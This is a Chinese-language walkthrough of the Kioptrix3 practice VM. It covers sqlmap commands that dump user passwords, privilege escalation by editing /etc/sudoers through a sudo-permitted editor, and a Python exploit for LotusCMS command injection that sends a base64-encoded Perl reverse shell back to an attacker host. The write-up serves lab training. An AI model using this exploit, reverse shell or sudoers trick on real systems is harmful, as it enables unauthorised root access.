品味人生系列-[每日一靶机]:Kioptrix3

admin 2022年12月15日10:23:27评论22 views字数 3863阅读12分52秒阅读模式

每日一靶机-Kioptrix3

靶机:192.168.10.137

靶机:192.168.10.133

以练带学,补充细节,直击痛点,补救遗忘。

IcMl0x824

咳咳,有Goby+Xray高级版不用,非要用rustscan+nmap,耶耶要的就是情怀!

echo "192.168.10.137 kioptrix3.com" >> /etc/hosts

淦信息

品味人生系列-[每日一靶机]:Kioptrix3

可以可以,这个粉色爪子是 lotusCMS

淦漏扫

简单粗暴,但是效果不是很好。

品味人生系列-[每日一靶机]:Kioptrix3

品味人生系列-[每日一靶机]:Kioptrix3

淦自己

毫无意外,如果今天你只依靠单向的信息,你就无法赢得更多

http://192.168.10.137/phpmyadmin/index.php

品味人生系列-[每日一靶机]:Kioptrix3

并不是很想从这里下手,虽然有EXP这个可以利用,但是不一定成功。

web狗就要有web日进去的觉悟,ok?

把能点的都点一遍,我相信能更多的胜过工具的,虽然这样很累。

淦漏洞

命令注入

http://192.168.10.137/index.php?page=index

实际上我们看到了,这里的page参数,实际是可控的

品味人生系列-[每日一靶机]:Kioptrix3

这三个页面分别有一个page参数和system参数,没有过多的手工测试,看Xray的结果

http://192.168.10.137/index.php?page=index'-var_dump(md5(207520396))-'

品味人生系列-[每日一靶机]:Kioptrix3

个人感觉作用不很大,测试了多条语句后其实没啥卵用,可能是某块代码写的不严罢了。

其实可以在system这几个参数多测测,可能存在包含漏洞啊,注入之类的。

SQL注入

跳转到这时,我觉得就有SQL注入呢味儿了,找找看

品味人生系列-[每日一靶机]:Kioptrix3

看到这个页面,不淡定了。发现这里可以进行排序,我那片关于SQL注入的文章不就是说,有关能排序的地方应该改要多家考虑,呵呵。其实他也是参数可控对吧。品味人生系列-[每日一靶机]:Kioptrix3

品味人生系列-[每日一靶机]:Kioptrix3

还等什么呢,丢到sqlmap里跑起!

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -p id --batch -T 'gallery' --current-db

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -p id --batch -T 'gallery' --tables

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -p id --batch -T 'gallery' -T gallarific_users --columns

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -p id --batch -T 'gallery' -T gallarific_users -C username,password --dump
+----------+----------+
| username | password |
+----------+----------+
| admin   | n0t7t1k4 |
+----------+----------+
| 1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |

跑出来了几个账号组合,测试了一下,不能登录 web,其实你把所有表的信息都跑出来,自然就登上了。

之前不是还扫出了 SSH吗,试了下登录成功,2个都可以登录

按照这种靶机的尿性,只要开SSH,随便爆出的密码多半就能用,后台你别想进。

淦提权

┌──(root💀kali)-[~]
└─# ssh [email protected]                
Unable to negotiate with 192.168.10.137 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

笑了,连不上就不连了

换个地方连

品味人生系列-[每日一靶机]:Kioptrix3

因为dreg 账号实在是没什么可利用的,看下loneferret 账号下有一些利用的点

存在sudo命令

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
  (root) NOPASSWD: !/usr/bin/su
  (root) NOPASSWD: /usr/local/bin/ht

好家伙,一些提权漏洞基本用不了,666

(root) NOPASSWD: /usr/local/bin/ht

ht编辑器被分配root权限。

如果编辑/etc/sudoers,在里面给lone这个用户加权限

可以直接拿root的shell了

直接运行

品味人生系列-[每日一靶机]:Kioptrix3

发现是个编辑器,那么就可以尝试编辑修改 /etc/sudoers 文件

alt + f 进去,下键到打开

输入etc/sudoers

sudo的权限控制可以在/etc/sudoers文件中查看到

品味人生系列-[每日一靶机]:Kioptrix3

嘿嘿嘿

品味人生系列-[每日一靶机]:Kioptrix3

只需要把下面这个用户改成和上面一样就ok

品味人生系列-[每日一靶机]:Kioptrix3

然后

F10 退出,Y保存,提权成功

品味人生系列-[每日一靶机]:Kioptrix3

他妈的最恶心的就是这个编辑器,不知道怎么操作,你妈的。

淦结语

基本就是web应用层漏洞钻进来,然后 sudoers提权,其实能利用的地方挺多的,之前可以从phpmyadmin下手,也可以直接msf搜cms的洞去拿shell,也可以用sqlmap上去搞,传马子,都可以,基本只要拿到密码就可以了,ssh登陆提权还是有迹可循。提权也不至于就这一种第三方应用提权的法子,需要多用别的工具看看有没有现成的exp了。

不连NC没有灵魂

from requests import get
import re
import random
from urllib import parse
import base64
import threading

# 生成随机码
def gen_string():
   key = ""
   for i in range(10):
       key += chr(random.randint(65,90))
   return key

# 检查漏洞是否存在
def check(target):
   if "http" not in target:
       target = "http" + target
   result = get(target)
   find = re.search(r'<a.*href=['|"](/*index.php)?.*(page=w+)['|"].*>',result.text)
   if find is None:
       print("[*] INFO: Not fond vulnerability.")
       return 0
   key = gen_string()
   target += "index.php?page=index');"+parse.quote("echo '"+key+"';//")
   res = get(target)
   if key in res.text:
       print("[!] INFO: Find vul!!!")
       return True
   print("[*] INFO: Not fond vulnerability.")
   return 0

def exp(target,host,port):
   poc =  """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" %(host,port)
   poc = base64.b64encode(poc.encode('utf-8'))
   target += "index.php?page=index');"+parse.quote("system(base64_decode(%s));//" %poc)
   print("[~] Confirm: please run 'nc -lvp %s' on your client" %port)
   input("t|--- Please enter any key to start!")
   threading.Thread(target=get, args=(target,)).start()
   print("[?] INFO: Get shell?")
   print("[!] INFO: If the attack is successful,The thread is being requested to suspend……")
   exit(0)

# target : please input target
# host : please input lhost
# port : please input lport
target = "http://192.168.10.137/"
host = "192.168.10.133"
port = "4444"

if check(target):
   exp(target, host, port)

品味人生系列-[每日一靶机]:Kioptrix3

接下来一样的

原文始发于微信公众号(猫因的安全):品味人生系列-[每日一靶机]:Kioptrix3

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月15日10:23:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   品味人生系列-[每日一靶机]:Kioptrix3http://cn-sec.com/archives/1465448.html

发表评论

匿名网友 填写信息